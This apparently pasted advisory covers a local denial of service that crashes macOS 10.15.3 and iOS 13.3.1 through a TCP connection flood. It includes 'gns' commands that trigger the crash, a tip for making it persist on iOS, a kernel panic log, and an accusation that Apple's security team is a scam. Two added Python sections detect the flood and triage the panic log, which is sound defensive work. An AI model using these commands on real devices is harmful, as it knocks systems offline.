- Crash macOS 10.15.3 and iOS 13.3.1 by sending large data packets >= 2MB over 16 or more TCP connections
- https://www.youtube.com/watch?v=yEUncSvY04Y
- https://www.youtube.com/watch?v=3p_hakQXYxo
- https://www.youtube.com/watch?v=E1Plab0CgJM
- https://www.youtube.com/watch?v=mJryK4kA0qM
- Exploit description
- Resource limits and their handling within the TCP stack on iOS and macOS allow an attacker to exhaust a pool of system resources, causing system components to stop responding while they wait to obtain a resource. As a result, user space is unable to service the watchdog, which expires a minute later and generates a kernel panic.
- Attack vector
- To exploit the vulnerability one has to establish 16 or more TCP connections; 32 to 128 connections work reliably and trigger it every time. Then start a dedicated thread for each connection and send large packets of 2 MB or more. iOS reboots instantly. After a successful exploit on macOS, the exploit application cannot be stopped or killed. In that state, some applications such as Activity Monitor stop responding, and within a minute there is a kernel panic (userspace watchdog timeout) and the machine powers off. The exploit can be triggered by any local user. On iOS, persistence can be obtained by registering the exploit to run as a Widget or to handle Notifications.
- Vulnerability type: Denial of Service (local), may persist after reboot
- Component: kernel resource pool, TCP stack
- Vendor: Apple Inc.
- Product: macOS, iOS
- Version: macOS Catalina 10.15.3, iOS 13.3.1
- Impact: Denial of Service (local)
- product-security@apple.com is a scam! Apple do not want to acknowledge and pay bounty to people who discover exploits.
- I disclosed this exploit privately to them on 18th of February 2020. A couple of weeks later they stopped replying to my e-mails.
- Proof of Concept (PoC): download my network benchmark tool and use it to exploit the vulnerability:
- http://httpstorm.com/tools/gns/
- Steps to reproduce:
- The device that sends the large data packets will crash; it can be either the server or the client.
- exploit commands 1: the same device operates as both server and client and will crash. No remote server or client is required.
- the device opens a listening socket on TCP port 81, connects to itself and starts sending data over 32 connections.
- server: gns -lp81
- client: gns 127.0.0.1 81 -wc32
- exploit commands 2: client will crash
- the server listens on TCP port 81; the client connects to the server IP on TCP port 81 and sends large data packets over 32 connections
- server: gns -lp81
- client: gns SERVER_IP 81 -wc32
- exploit commands 3: server will crash
- the server listens on TCP port 81; the client establishes 32 connections to the server IP on TCP port 81, and the server sends large data packets over all of them
- server: gns -wlp81
- client: gns SERVER_IP 81 -c32
- Legend:
- l = listen
- p = specify port number
- 81 = use TCP port 81
- w = this device sends data over the TCP connection
- c = specify number of TCP connections
- 32 = use 32 TCP connections
- SERVER_IP = IP address of server
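A defender-side check for the condition described in the steps above, added here as an example and not part of the paste or of the gns tool: it parses `lsof -nP -iTCP` output and reports any process holding 16 or more established TCP connections to a single peer host, 16 being the minimum count the advisory gives. The sample output is constructed (the process name, PID 41322, file descriptors and addresses are made up), and the check is a triage heuristic for spotting a connection flood before the watchdog fires, not a fix for the underlying resource-pool exhaustion.

```python
import re
import subprocess
import sys
from collections import Counter

# Minimum connection count named in the advisory for triggering the hang.
SUSPICIOUS_CONNECTIONS = 16

# One ESTABLISHED line of `lsof -nP -iTCP`:
# COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME, NAME = local->remote (STATE)
LSOF_LINE_RE = re.compile(
    r"^(?P<cmd>\S+)\s+(?P<pid>\d+)\s+(?P<user>\S+)\s+\S+\s+IPv[46]\s+\S+\s+\S+\s+TCP\s+"
    r"(?P<local>\S+)->(?P<remote>\S+)\s+\(ESTABLISHED\)$"
)


def build_sample_lsof(n_conn=32, pid=41322):
    """Constructed sample modelled on `lsof -nP -iTCP` output: one process holding
    n_conn loopback connections to port 81 (the self-connect scenario from the
    paste) plus an unrelated browser connection. All values are made up."""
    header = "COMMAND   PID  USER   FD   TYPE             DEVICE SIZE/OFF NODE NAME"
    lines = [header,
             f"gns     {pid}  alice    5u  IPv4 0x1a2b3c4d5e6f0000      0t0  TCP *:81 (LISTEN)"]
    for i in range(n_conn):
        lines.append(f"gns     {pid}  alice   {6 + i}u  IPv4 0x1a2b3c4d5e6f{i:04x}      0t0  TCP "
                     f"127.0.0.1:{50000 + i}->127.0.0.1:81 (ESTABLISHED)")
    lines.append("Safari   1234  alice   40u  IPv4 0x1a2b3c4d5e6fffff      0t0  TCP "
                 "192.0.2.10:52011->198.51.100.7:443 (ESTABLISHED)")
    return "\n".join(lines)


def find_connection_floods(lsof_output, threshold=SUSPICIOUS_CONNECTIONS):
    """Count ESTABLISHED TCP connections per (pid, command, remote host) and return
    the groups at or above the threshold, largest first. LISTEN sockets and the
    header are skipped because they do not match LSOF_LINE_RE."""
    counts = Counter()
    for line in lsof_output.splitlines():
        m = LSOF_LINE_RE.match(line)
        if not m:
            continue
        # Strip the port so 32 connections to one host count as one group,
        # whichever ephemeral ports they use.
        remote_host = m.group("remote").rsplit(":", 1)[0]
        counts[(int(m.group("pid")), m.group("cmd"), remote_host)] += 1
    flagged = [(key, n) for key, n in counts.items() if n >= threshold]
    return sorted(flagged, key=lambda kv: -kv[1])


if __name__ == "__main__":
    # `--live` runs the real lsof on this host; otherwise the constructed sample is used.
    if "--live" in sys.argv:
        output = subprocess.run(["lsof", "-nP", "-iTCP"], capture_output=True, text=True).stdout
    else:
        output = build_sample_lsof()
    for (pid, cmd, host), n in find_connection_floods(output):
        print(f"{cmd}[{pid}] holds {n} established TCP connections to {host}")
```

Run without arguments the script reports the constructed gns process; with `--live` it inspects the current host. Grouping by remote host rather than by remote port is deliberate: the flood in the advisory uses one destination port but many ephemeral source ports, so a per-port grouping would undercount it.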
- panic(cpu 2 caller 0xffffff7f9bd9dad5): userspace watchdog timeout: remoted connection watchdog expired, no updates from remoted monitoring thread in 60 seconds, 27 checkins from thread since monitoring enabled 580 seconds ago after load
- service: com.apple.logd, total successful checkins since load (580 seconds ago): 58, last successful checkin: 10 seconds ago
- service: com.apple.WindowServer, total successful checkins since load (550 seconds ago): 54, last successful checkin: 10 seconds ago
- Backtrace (CPU 2), Frame : Return Address
- 0xffffff83c5dd3820 : 0xffffff801b33bb2b
- 0xffffff83c5dd3870 : 0xffffff801b4734d5
- 0xffffff83c5dd38b0 : 0xffffff801b464f4e
- 0xffffff83c5dd3900 : 0xffffff801b2e2a40
- 0xffffff83c5dd3920 : 0xffffff801b33b217
- 0xffffff83c5dd3a20 : 0xffffff801b33b5fb
- 0xffffff83c5dd3a70 : 0xffffff801bad2b25
- 0xffffff83c5dd3ae0 : 0xffffff7f9bd9dad5
- 0xffffff83c5dd3af0 : 0xffffff7f9bd9d7e6
- 0xffffff83c5dd3b10 : 0xffffff801ba6739b
- 0xffffff83c5dd3b60 : 0xffffff801ba70443
- 0xffffff83c5dd3ca0 : 0xffffff801b422d12
- 0xffffff83c5dd3db0 : 0xffffff801b3419d8
- 0xffffff83c5dd3e10 : 0xffffff801b318635
- 0xffffff83c5dd3e70 : 0xffffff801b32f0e5
- 0xffffff83c5dd3f00 : 0xffffff801b44b575
- 0xffffff83c5dd3fa0 : 0xffffff801b2e3226
- Kernel Extensions in backtrace:
- com.apple.driver.watchdog(1.0)[053A5D15-51D4-3E61-978B-EB435FA4BD0A]@0xffffff7f9bd9c000->0xffffff7f9bda4fff
- BSD process name corresponding to current thread: watchdogd
- Boot args: chunklist-security-epoch=0 -chunklist-no-rev2-dev
- Mac OS version:
- 19D76
- Kernel version:
- Darwin Kernel Version 19.3.0: Thu Jan 9 20:58:23 PST 2020; root:xnu-6153.81.5~1/RELEASE_X86_64
- Kernel UUID: A8DDE75C-CD97-3C37-B35D-1070CC50D2CE
- Kernel slide: 0x000000001b000000
- Kernel text base: 0xffffff801b200000
- __HIB text base: 0xffffff801b100000
- System model name: MacBookPro15,1 (Mac-937A206F2EE63C01)
- System shutdown begun: NO
- System uptime in nanoseconds: 589081430568
- last loaded kext at 18150396650: @kext.AMDFramebuffer 3.0.5 (addr 0xffffff7fa09c8000, size 249856)
- loaded kexts:
- @kext.AMDFramebuffer 3.0.5
- @kext.AMDRadeonX4000 3.0.5
- @kext.AMDRadeonServiceManager 3.0.5
- >!AGraphicsDevicePolicy 4.7.2
- @fileutil 20.036.15
- @AGDCPluginDisplayMetrics 4.7.2
- >!AHV 1
- |IOUserEthernet 1.0.1
- |IO!BSerialManager 7.0.3f5
- >pmtelemetry 1
- >!AUpstreamUserClient 3.6.8
- >!APlatformEnabler 2.7.0d0
- >AGPM 111.4.2
- >X86PlatformShim 1.0.0
- @Dont_Steal_Mac_OS_X 7.0.0
- >!A!IKBLGraphics 14.0.4
- >AGDCBacklightControl 4.7.2
- >ACPI_SMC_PlatformPlugin 1.0.0
- >!AThunderboltIP 3.1.3
- @kext.AMD9500!C 3.0.5
- >BridgeAudioCommunication 6.66
- >!ABacklight 180.1
- >!ATopCaseHIDEventDriver 3430.1
- >!AGFXHDA 100.1.424
- >!A!ISlowAdaptiveClocking 4.0.0
- >!A!IPCHPMC 2.0.1
- >!AMuxControl2 4.7.2
- >!AHIDALSService 1
- >!ABridgeAudio!C 6.66
- >!A!ICFLGraphicsFramebuffer 14.0.4
- >!AAVEBridge 6.1
- >!AFIVRDriver 4.1.0
- >!AMCCSControl 1.13
- @filesystems.autofs 3.0
- @filesystems.ntfs 3.14.3
- >BCMWLANFirmware4355.Hashstore 1
- >BCMWLANFirmware4364.Hashstore 1
- >BCMWLANFirmware4377.Hashstore 1
- >!AFileSystemDriver 3.0.1
- @filesystems.hfs.kext 522.0.9
- @BootCache 40
- @!AFSCompression.!AFSCompressionTypeDataless 1.0.0d1
- @!AFSCompression.!AFSCompressionTypeZlib 1.0.0
- >!AVirtIO 1.0
- >!ABCMWLANBusInterfacePCIe 1
- @filesystems.apfs 1412.81.1
- @private.KextAudit 1.0
- >!ASmartBatteryManager 161.0.0
- >!AACPIButtons 6.1
- >!ASMBIOS 2.1
- >!AACPIEC 6.1
- >!AAPIC 1.7
- $!AImage4 1
- @nke.applicationfirewall 303
- $TMSafetyNet 8
- @!ASystemPolicy 2.0.0
- |EndpointSecurity 1
- @kext.AMDRadeonX4100HWLibs 1.0
- @kext.AMDRadeonX4000HWServices 3.0.5
- |IOAVB!F 800.17
- >!ASSE 1.0
- @!AGPUWrangler 4.7.2
- >IOPlatformPluginLegacy 1.0.0
- >!AHDA!C 283.15
- |IOHDA!F 283.15
- >!ABacklightExpert 1.1.0
- >!AHS!BDriver 3430.1
- >IO!BHIDDriver 7.0.3f5
- |IONDRVSupport 569.4
- >!AActuatorDriver 3430.1
- >!AMultitouchDriver 3430.1
- >!AInputDeviceSupport 3430.1
- |IOSlowAdaptiveClocking!F 1.0.0
- >X86PlatformPlugin 1.0.0
- >IOPlatformPlugin!F 6.0.0d8
- >!AGraphicsControl 4.7.2
- >!AThunderboltEDMSink 4.2.2
- >!AThunderboltDPOutAdapter 6.2.5
- >!AHIDKeyboard 209
- |IO!BHost!CUARTTransport 7.0.3f5
- |IO!BHost!CTransport 7.0.3f5
- >!A!ILpssUARTv1 3.0.60
- >!A!ILpssUARTCommon 3.0.60
- >!AOnboardSerial 1.0
- >!ASMBusPCI 1.0.14d1
- @kext.AMDSupport 3.0.5
- @!AGraphicsDeviceControl 4.7.2
- |IOAccelerator!F2 438.3.1
- >!ASMBus!C 1.0.18d1
- |IOGraphics!F 569.4
- @plugin.IOgPTPPlugin 810.1
- |IOEthernetAVB!C 1.1.0
- @kext.triggers 1.0
- >usb.IOUSBHostHIDDevice 1.2
- >usb.cdc.ecm 5.0.0
- >usb.cdc.ncm 5.0.0
- >usb.cdc 5.0.0
- >usb.networking 5.0.0
- >usb.!UHostCompositeDevice 1.2
- |IOSurface 269.6
- @filesystems.hfs.encodings.kext 1
- |IOAudio!F 300.2
- @vecLib.kext 1.2.0
- >!ABCMWLANCore 1.0.0
- >mDNSOffloadUserClient 1.0.1b8
- >IOImageLoader 1.0.0
- |IOSerial!F 11
- |IO80211!FV2 1200.12.2b1
- >corecapture 1.0.4
- |IOSkywalk!F 1
- >!AThunderboltPCIDownAdapter 2.5.4
- >!AThunderboltDPInAdapter 6.2.5
- >!AThunderboltDPAdapter!F 6.2.5
- >!AHPM 3.4.4
- >!A!ILpssI2C!C 3.0.60
- >!A!ILpssDmac 3.0.60
- >!A!ILpssI2C 3.0.60
- >!AXsanScheme 3
- >usb.!UVHCIBCE 1.2
- >usb.!UVHCI 1.2
- >usb.!UVHCICommonBCE 1.0
- >usb.!UVHCICommon 1.0
- >!AThunderboltNHI 5.8.6
- |IOThunderbolt!F 7.6.0
- >!AEffaceableNOR 1.0
- |IOBufferCopy!C 1.1.0
- |IOBufferCopyEngine!F 1
- >usb.!UHostPacketFilter 1.0
- |IOUSB!F 900.4.2
- |IONVMe!F 2.1.0
- >usb.!UXHCIPCI 1.2
- >usb.!UXHCI 1.2
- >!AEFINVRAM 2.1
- >!AEFIRuntime 2.1
- >!ASMCRTC 1.0
- |IOSMBus!F 1.1
- |IOHID!F 2.0.0
- $quarantine 4
- $sandbox 300.0
- @kext.!AMatch 1.0.0d1
- >!AKeyStore 2
- >!UTDM 489.80.2
- |IOSCSIBlockCommandsDevice 422.0.2
- >!ACredentialManager 1.0
- >KernelRelayHost 1
- >!ASEPManager 1.0.1
- >IOSlaveProcessor 1
- >!AFDEKeyStore 28.30
- >!AEffaceable!S 1.0
- >!AMobileFileIntegrity 1.0.5
- @kext.CoreTrust 1
- |CoreAnalytics!F 1
- |IOTimeSync!F 810.1
- |IONetworking!F 3.4
- >DiskImages 493.0.0
- |IO!B!F 7.0.3f5
- |IO!BPacketLogger 7.0.3f5
- |IOUSBMass!SDriver 157.40.7
- |IOSCSIArchitectureModel!F 422.0.2
- |IO!S!F 2.1
- |IOUSBHost!F 1.2
- >usb.!UCommon 1.0
- >!UHostMergeProperties 1.2
- >!ABusPower!C 1.0
- |IOReport!F 47
- >!AACPIPlatform 6.1
- >!ASMC 3.1.9
- >watchdog 1
- |IOPCI!F 2.9
- |IOACPI!F 1.4
- @kec.pthread 1
- @kec.corecrypto 1.0
- @kec.Libm 1
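Triage of the panic log quoted above, as an added example that is not part of the paste and not from the httpstorm tool: it extracts the watchdog reason, the faulting process, the last check-in age per service, the backtrace frames and the kext address range, then attributes each return address either to a kext (by the range the log prints) or to the kernel by subtracting the reported kernel slide, which is the first step of symbolicating such a log against the matching kernel. The sample input is an excerpt of the log on this page with the loaded-kexts list truncated to five entries. The expansion table for the compressed kext names is my reconstruction of the abbreviations Catalina panic logs use; the test cross-checks it against the un-abbreviated com.apple.driver.watchdog that the backtrace section prints in full.

```python
import re

# Excerpt of the macOS 10.15.3 panic log reproduced in the paste; the
# "loaded kexts" list is truncated to a handful of entries.
PANIC_LOG = """\
panic(cpu 2 caller 0xffffff7f9bd9dad5): userspace watchdog timeout: remoted connection watchdog expired, no updates from remoted monitoring thread in 60 seconds, 27 checkins from thread since monitoring enabled 580 seconds ago after load
service: com.apple.logd, total successful checkins since load (580 seconds ago): 58, last successful checkin: 10 seconds ago
service: com.apple.WindowServer, total successful checkins since load (550 seconds ago): 54, last successful checkin: 10 seconds ago
Backtrace (CPU 2), Frame : Return Address
0xffffff83c5dd3820 : 0xffffff801b33bb2b
0xffffff83c5dd3a70 : 0xffffff801bad2b25
0xffffff83c5dd3ae0 : 0xffffff7f9bd9dad5
0xffffff83c5dd3af0 : 0xffffff7f9bd9d7e6
0xffffff83c5dd3b10 : 0xffffff801ba6739b
Kernel Extensions in backtrace:
com.apple.driver.watchdog(1.0)[053A5D15-51D4-3E61-978B-EB435FA4BD0A]@0xffffff7f9bd9c000->0xffffff7f9bda4fff
BSD process name corresponding to current thread: watchdogd
Kernel slide: 0x000000001b000000
Kernel text base: 0xffffff801b200000
loaded kexts:
>!AHDA!C 283.15
|IOPCI!F 2.9
$sandbox 300.0
@kec.pthread 1
>watchdog 1
"""

FRAME_RE = re.compile(r"^(0x[0-9a-f]+) : (0x[0-9a-f]+)$")
KEXT_RANGE_RE = re.compile(
    r"^(?P<name>[\w.]+)\([^)]*\)\[[0-9A-Fa-f-]+\]@(?P<start>0x[0-9a-f]+)->(?P<end>0x[0-9a-f]+)$"
)
SERVICE_RE = re.compile(r"^service: (\S+), .*last successful checkin: (\d+) seconds ago$")

# Abbreviations used in the compressed "loaded kexts" list. This table is my
# reconstruction; it reproduces "com.apple.driver.watchdog", which the backtrace
# section of the same log prints un-abbreviated.
KEXT_PREFIX = {"@": "com.apple.", ">": "com.apple.driver.",
               "|": "com.apple.iokit.", "$": "com.apple.security."}
KEXT_INFIX = {"!A": "Apple", "!B": "Bluetooth", "!C": "Controller", "!F": "Family",
              "!I": "Intel", "!S": "Storage", "!U": "AppleUSB"}


def expand_kext_name(abbrev):
    """Turn an abbreviated kext name such as '>!AHDA!C' into its bundle identifier."""
    prefix = KEXT_PREFIX.get(abbrev[0], "")
    body = abbrev[1:] if abbrev[0] in KEXT_PREFIX else abbrev
    for short, full in KEXT_INFIX.items():
        body = body.replace(short, full)
    return prefix + body


def triage_panic(text):
    """Pull out the fields a responder needs: reason, faulting process, per-service
    check-in ages, backtrace frames, kext ranges, kernel slide and loaded kexts."""
    info = {"reason": None, "process": None, "slide": None,
            "services": [], "frames": [], "kexts": [], "loaded": []}
    in_loaded = False
    for line in text.splitlines():
        m_service = SERVICE_RE.match(line)
        m_frame = FRAME_RE.match(line)
        m_kext = KEXT_RANGE_RE.match(line)
        if line.startswith("panic("):
            info["reason"] = line.split("): ", 1)[1]
        elif m_service:
            info["services"].append((m_service.group(1), int(m_service.group(2))))
        elif line.startswith("BSD process name corresponding to current thread: "):
            info["process"] = line.rsplit(": ", 1)[1]
        elif line.startswith("Kernel slide: "):
            info["slide"] = int(line.split(": ", 1)[1], 16)
        elif line == "loaded kexts:":
            in_loaded = True
        elif in_loaded and line:
            abbrev, _, version = line.partition(" ")
            info["loaded"].append((expand_kext_name(abbrev), version))
        elif m_frame:
            info["frames"].append((int(m_frame.group(1), 16), int(m_frame.group(2), 16)))
        elif m_kext:
            info["kexts"].append((m_kext.group("name"),
                                  int(m_kext.group("start"), 16), int(m_kext.group("end"), 16)))
    return info


def attribute(ret_addr, info):
    """Map a return address to (module, offset): an offset into a kext whose range the
    log lists, otherwise the un-slid kernel address (address minus kernel slide)."""
    for name, start, end in info["kexts"]:
        if start <= ret_addr <= end:
            return name, ret_addr - start
    return "kernel", ret_addr - info["slide"]


def symbolized_backtrace(info):
    """Attribute every frame; frames inside com.apple.driver.watchdog confirm the panic
    was raised by the watchdog, not by a fault in the TCP stack itself."""
    return [attribute(ret, info) for _, ret in info["frames"]]


if __name__ == "__main__":
    info = triage_panic(PANIC_LOG)
    print("reason :", info["reason"])
    print("process:", info["process"])
    for svc, last in info["services"]:
        print(f"service {svc}: last check-in {last}s ago")
    for module, off in symbolized_backtrace(info):
        print(f"  {module}+0x{off:x}")
```

The un-slid kernel addresses (for example 0xffffff801b33bb2b minus the slide 0x1b000000 gives 0xffffff800033bb2b) are what you would look up in the symbols of the matching xnu-6153.81.5 kernel; the per-service check-in ages show the monitored daemons were still checking in 10 seconds before the panic, which is consistent with a userspace hang rather than a kernel fault.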